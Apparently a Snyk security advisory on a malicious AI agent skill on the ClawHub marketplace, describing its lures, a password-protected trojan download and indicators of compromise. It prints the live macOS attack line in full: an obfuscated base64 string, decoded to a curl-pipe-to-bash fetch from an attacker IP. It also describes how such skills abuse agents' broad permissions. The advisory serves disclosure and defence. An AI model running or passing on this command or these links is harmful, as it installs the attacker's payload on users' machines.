Inside the 'clawdhub' Malicious Campaign: AI Agent Skills Drop Reverse Shells on OpenClaw Marketplace
Written by
Headshot of Liran Tal
Liran Tal

7 mins read
On Sunday, February 2nd, Snyk’s security research team uncovered a targeted malware campaign embedded directly within the ClawHub skills marketplace (clawhub.ai), a popular repository for AI agent capabilities.

The malicious entry, originally published by user zaycv under the name clawhub, masquerades as an official CLI tool for managing agent skills. While the original instance was removed on February 3rd, Snyk researchers have identified a currently active variant named clawdhub1, which has already garnered nearly 100 installations.

The clawdhub1 malware on clawhub skills marketplace pretending to be the clawhub installer
This active campaign confirms the urgent warnings Snyk issued earlier this year regarding the security risks of AI personal assistants and the specific danger of "SKILL.md" files serving as attack vectors. If you have interacted with "ClawHub CLI" skills or followed installation instructions from user zaycv in the last 48 hours, assume your host machine is compromised.

The clawdhub1 infection chain
The attack relies on a multi-stage delivery mechanism that bypasses ClawHub's (limited) static analysis by keeping the malicious logic entirely external to the SKILL.md file.

1. Social engineering: The performance lure
The attacker, zaycv, uses technical jargon to target power users. The skill description promises "advanced caching and compression" and "optimizing performance" for skill publishing. This specific framing targets developers who are likely to be frustrated with standard tool latency, making them more willing to install an "optimization" utility without second-guessing the prerequisites.

the user Ddoy233 on GitHub which is likely an adversarial creating a new fake account specifically to deliver the openclaw and clawhub malware - this matches the user zaycv on the clawhub marketeplace
2. The windows vector: Password-protected evasion
For Windows users, the SKILL.md links to a GitHub release hosted by user Ddoy233 (an account created specifically for this campaign).

Repo: https://github.com/Ddoy233/openclawcli

Technique: The archive (openclawcli.zip) is password-protected (password: openclaw).

Why this matters: Encrypting the zip file is a deliberate tradecraft technique used to bypass automated security scanners, email filters, and browser safety checks that attempt to inspect archive contents for malware signatures. Inside, the "CLI" contains a Trojanized executable and DLLs likely functioning as an infostealer.

the clawdhub1 malware code repository on GitHub that hides encrypted releases to evade GitHub and anti virus detection software, created to fool users into installing a fake openclaw and clawhub marketplace from a skill
3. The macOS vector: Obfuscated Glot.io execution
The macOS instruction directs users to a snippet on glot.io, a code-sharing pastebin. This adds a layer of indirection; the malicious code isn't in the SKILL.md, nor is it a direct file download.

The Obfuscation Layer: The snippet appears to print a benign "Installer-Package" message but pipes a base64 string into bash:

The download.setup-service.com URL is a decoy string intended to look like a legitimate package source in terminal output to reassure the user.

The base64 -D | bash chain is the actual execution trigger.

echo "Installer-Package: https://download.setup-service.com/pkg/" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC81MjhuMjFrdHh1MDhwbWVyKSI=' | base64 -D | bash
The Payload: Decoded, the command is a direct retrieval of a shell script from a raw IP address:

/bin/bash -c "$(curl -fsSL http://91.92.242.30/528n21ktxu08pmer)"
This executes a stage-2 payload from 91.92.242.30, a non-reputable IP address that bypasses domain blocklists.

Timeline of discovery
Feb 2, 2026: Snyk Staff Research Engineer Luca Beurer-Kellner identifies the original malicious skill clawhub (7,743 downloads) on the marketplace.

Feb 3, 2026: The clawhub skill is removed from the marketplace.

Feb 3, 2026 (Later): Snyk Incubation Engineer Aleksei Kudrinskii discovers the attacker has returned with a renamed variant, clawdhub1, which remains active and operational.

Feb 4, 2026: Snyk releases this advisory.

The Snyk perspective: Securing the AI supply chain
This incident highlights a critical blind spot in the modern "AI Stack." We are moving from a world of code dependencies to agent capability dependencies.

Traditional AppSec tools scan your code and containers. They do not read the English-language instructions in a SKILL.md file, nor do they validate the intent of an AI Agent's "tool use."

The "Spicy" Risk of Agentic Workflow: as discussed in our Clawdbot analysis, AI agents like OpenClaw are often granted broad permissions, reading emails, accessing filesystems, and executing shell commands, to be useful assistants. When a malicious skill like clawdhub1 is installed, it inherits these permissions. The malware doesn't just compromise the machine; it can potentially compromise every service the AI agent is authorized to access, from GitHub repositories to cloud infrastructure.

This is where Snyk Evo applies. Snyk’s Evo platform and AI-SPM (AI Security Posture Management) are designed to govern exactly this type of unregulated interaction:

Unmanaged AI Models & Tools: Evo detects when developers or agents introduce unverified external tools (like a random Skill from a marketplace) into the corporate environment.

Supply Chain Visibility: Just as Snyk Advisor rates npm packages, Snyk's AI security research is now focused on rating the reputations of Agent Skills and Model Weights, flagging anomalies such as a "new user" (zaycv) publishing a "critical system tool" with zero community history.

How to defend against SKILLS and MCP malware
Snyk provides several ways to secure against AI-native threats:

Tools like mcp-scan (Model Context Protocol Scanner) are the next evolution of defense, ensuring that the instructions given to agents don't lead to system compromise. MCP Scan will detect MCP servers that are intentionally malicious via prompt injection or tool poisoning, and will also detect malicious and risky SKILL.md files.

Tools like Snyk’s AI-BOM (another command you can easily run: snyk aibom) will help you uncover the inventory of AI components in use across your codebase, inclusive of AI models, agents, MCP Servers, datasets, and plugins.

Remediation and IOCs
Immediate Actions:

Block Traffic: Block egress to 91.92.242.30 at the firewall level immediately.

Audit Skills: Check your ClawHub account and local agent configurations for any skills named clawhub or clawdhub1 installed by user zaycv.

Run Snyk Checks: Ensure your AI development environments are scanned.

Indicators of Compromise (IOCs):

Domains/IPs: 91.92.242.30

URLs: https://glot.io/snippets/hfd3x9ueu5, https://github.com/Ddoy233/openclawcli

Usernames: zaycv (ClawHub), Ddoy233 (GitHub)

Package Names: clawhub, clawdhub1